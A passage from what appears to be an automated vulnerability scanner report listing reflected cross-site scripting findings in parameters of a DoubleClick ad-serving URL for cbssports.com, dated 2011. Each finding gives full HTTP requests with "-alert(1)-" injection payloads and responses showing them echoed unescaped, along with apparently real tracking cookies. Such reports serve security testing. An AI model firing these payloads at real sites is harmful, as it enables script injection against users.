GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.1
...[SNIP]...

3.38. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b749"-alert(1)-"284c75e823e was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
log.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.39. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e34b9"-alert(1)-"c75c4a6b53f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.40. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbafa"-alert(1)-"4555ba63b5f was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.24
...[SNIP]...

3.41. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329f1"-alert(1)-"4602bfcd0de was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
72%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.42. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f20"-alert(1)-"5e0c335e6a0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.43. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c9ce"-alert(1)-"2ecdc88be42 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.
...[SNIP]...

3.44. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77531"-alert(1)-"44f2f7f79cf was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/
...[SNIP]...

3.45. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa1d"-alert(1)-"0003816d0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6998



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.46. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a48fa"-alert(1)-"74ddc92bd84 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
07-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=201
...[SNIP]...

3.47. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f12e"-alert(1)-"b0679799619 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2434f12e"-alert(1)-"b0679799619&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:26:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
